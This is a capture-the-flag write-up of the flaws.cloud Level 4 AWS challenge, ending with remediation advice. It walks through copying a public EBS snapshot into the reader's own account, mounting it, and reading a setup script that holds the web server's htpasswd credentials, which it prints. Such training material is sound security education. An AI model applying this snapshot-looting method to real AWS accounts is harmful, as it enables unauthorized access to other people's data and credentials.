Poorly Secured EBS Backups: Flaws.cloud Level4
Level 4 is located at http://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud and from there the author redirects us to another page at https://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/ which we can't access because the server is password protected.
The author provides a few hints as to where to start: the site is hosted on an EC2 instance and just before launch it was backed up with Elastic Block Storage ie. EBS. Before we even start trying to crack this bad boy we need to understand EC2 and EBS.
EC2 or Elastic Cloud Compute is AWS lingo for "rentable virtual servers". These are considered to be "elastic" because they can be configured with what are called autoscaling policies to increase or decrease the number of running servers in response to fluctuations in network traffic, computational power or storage. Typically files on a computer are stored on disk as block devices. In traditional computer terms, these are referred to as partitions whereas AWS refers to these as "volumes". If you plan on starting your own cloud company please don't re-invent the wheel and create a new terminology for literally everything!
EBS is Elastic Block Storage. A central marketing point of AWS is scalability, block storage is also elastic. With EBS DevOps engineers can create "snapshots" of "volumes", that is they can make what used to be called backups of what used to be called disk partitions. Creating EBS backups is good for backup recovery but it can also be utilized to share data across different hosts as EC2 autoscales.
S3 is also a storage platform too but it is not block storage, but singular object storage that is flat but gives the illusion of having a hierarchal file system. S3 is typically used for media distribution, CSS, JS, and log files while EBS is more typically used for raw file systems that can be moved to and from instances. Although S3 could technically store an entire filesystem I don't think anyone would want to go through all of the hassle to mount a filesystem from s3 on an EC2 instance.
Now back to the fun part. We'll need to see the snapshots that the AWS profile we obtained in the last level has access to and for that, we'll need the account id which we can obtain through the sts get-caller-identity
call:
{
"UserId": "AIDAJQ3H5DC3LEG2BKSLC",
"Account": "975426262029",
"Arn": "arn:aws:iam::975426262029:user/backup"
}
So long as we have the permission to do so we can also use the ec2
api to retrieve a list of snapshots belonging to the account:
$ aws --profile flaws ec2 describe-snapshots --owner-id 975426262029
{
"Snapshots": [
{
"Description": "",
"Encrypted": false,
"OwnerId": "975426262029",
"Progress": "100%",
"SnapshotId": "snap-0b49342abd1bdcb89",
"StartTime": "2017-02-28T01:35:12.000Z",
"State": "completed",
"VolumeId": "vol-04f1c039bc13ea950",
"VolumeSize": 8,
"Tags": [
{
"Key": "Name",
"Value": "flaws backup 2017.02.27"
}
],
"StorageTier": "standard"
}
]
}
The relevant information here is the SnapshotId and the VolumeID. Obviously, the VolumeID is the volume from which this snapshot was taken. In hint number 2 the author tells us that the snapshot was made public and that it's located in the us-west-2 region. For the life of me I don't know why anyone would ever need to make an EBS snapshot public and I continue to wonder why this is even a feature.
You'll need to do these next few steps from your own AWS account, be sure to delete everything after so you don't incur charges. We'll start by making a copy of the snapshot to our aws account, next, we'll create a volume from the snapshot, spin up an EC2 image, find the block device corresponding to the volume, mount it and take a peek around. than
Let's make a copy:
aws ec2 copy-snapshot --source-region us-west-2 --source-snapshot-id snap-0b49342abd1bdcb89
{
"SnapshotId": "snap-09b8be60b4991f255"
}
Time to make a volume:
aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-09b8be60b4991f255
{
"AvailabilityZone": "us-west-2a",
"CreateTime": "2023-06-05T17:51:48.000Z",
"Encrypted": false,
"Size": 8,
"SnapshotId": "snap-09b8be60b4991f255",
"State": "creating",
"VolumeId": "vol-0f6c414663df939f1",
"Iops": 100,
"Tags": [],
"VolumeType": "gp2",
"MultiAttachEnabled": false
}
We'll create an instance from the console, a plain old t2. micro Ubuntu will do. Take note of the instances ID for when it's time to attach the volume:
aws ec2 attach-volume --device xvdb --instance-id i-0af2cf604c7a09e0e --volume-id vol-0f6c414663df939f1
{
"AttachTime": "2023-06-05T18:13:53.967Z",
"Device": "xvdb",
"InstanceId": "i-0af2cf604c7a09e0e",
"State": "attaching",
"VolumeId": "vol-0f6c414663df939f1"
}
Devices are Linux files that represent hardware, in this case, we're creating a block device called xvdb
. Head on over to the instance in the AWS console and click connect. You can validate that you've got the xvdb
device by running ls /dev | grep xvdb
or you can see all of the block devices on the system by running lsblk
:
lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINTS
loop0 7:0 0 24.4M 1 loop /snap/amazon-ssm-agent/6312
loop1 7:1 0 55.6M 1 loop /snap/core18/2745
loop2 7:2 0 63.3M 1 loop /snap/core20/1879
loop3 7:3 0 111.9M 1 loop /snap/lxd/24322
loop4 7:4 0 53.2M 1 loop /snap/snapd/19122
xvda 202:0 0 8G 0 disk
├─xvda1 202:1 0 7.9G 0 part /
├─xvda14 202:14 0 4M 0 part
└─xvda15 202:15 0 106M 0 part /boot/efi
xvdb 202:16 0 8G 0 disk
└─xvdb1 202:17 0 8G 0 part
This is a list of block partitions on our disk xvda* being the primary partition volume and xvdb being the secondary volume which we just added. This partition contains the file system of the volume we just poached, we want to take a look around inside of there.
The process of attaching a block device to a file system is known as mounting and this is unironically achieved with the mount
command, which needs to be run with sudo privileges. We'll start by creating a mount point which is nothing more than a directory where the root of the new file system will be attached:
# create mount point
$ mkdir poached
# attach block device to mount point
$ sudo mount /dev/xvdb1 poached
# enter the filesysem
$ cd poached
# As you can see its a typical ext4 filsystem
$ /poached$ ls
bin dev home initrd.img.old lib64 media opt root sbin
srv tmp var vmlinuz.old boot etc initrd.img lib
lost+found mnt proc run snap sys usr vmlinuz
As you can see we have a whole Linux file system within the poached volume. It's been a while but remember we're looking for some clues to bypass the password authentication on the webserver. First, we'll check the home directory:
~/poached$ ls home/ubuntu
meta-data setupNginx.sh
How convenient a configuration shell script for the Nginx web server, lets see what that's about:
~/poached$ cat /home/ubuntu/setupNginx.sh
htpasswd -b /etc/nginx/.htpasswd flaws nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M
/etc
is the directory that stores the configuration files for all the services on the system. In this case, Nginx's htpasswd module is being used to require password authentication, the username being flaws
and the password being nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M
. If you log in with that username and password you'll see that you've pwnd the system!
This level is meant to teach us a few mistakes, the most obvious being not to store partitions publically. According to the author people sometimes store things publically in case they lose access to their account, if you do choose to go this route which I don't personally recommend you can add a layer of security by encrypting the volume. AWS offers various types of encryption suites where keys are either managed by you or the cloud provider.
Configuration scripts storing sensitive information need to be locked down, the author could have transferred the ownership of the script over to root, locked down `rwx` permissions for all other users and scheduled the running of the script at start time with either a cron or a job.
Lastly, configuration scripts are unnecessary for EC2 instances, due to launch configurations and launch templates which offer the option of running scripts, installing software and even managing compliance every time autoscaling spawns a new instance.
AWS gives you a lot of free stuff to play around with but eventually, they've got to make a buck and start charging you for the services you're using. To avoid running up an unwanted bill be sure to terminate the instance and destroy the attached volume and its associated snapshot. I find the easiest way to do this is through the web console. Thanks for reading, I'll see you over at Level 5 !!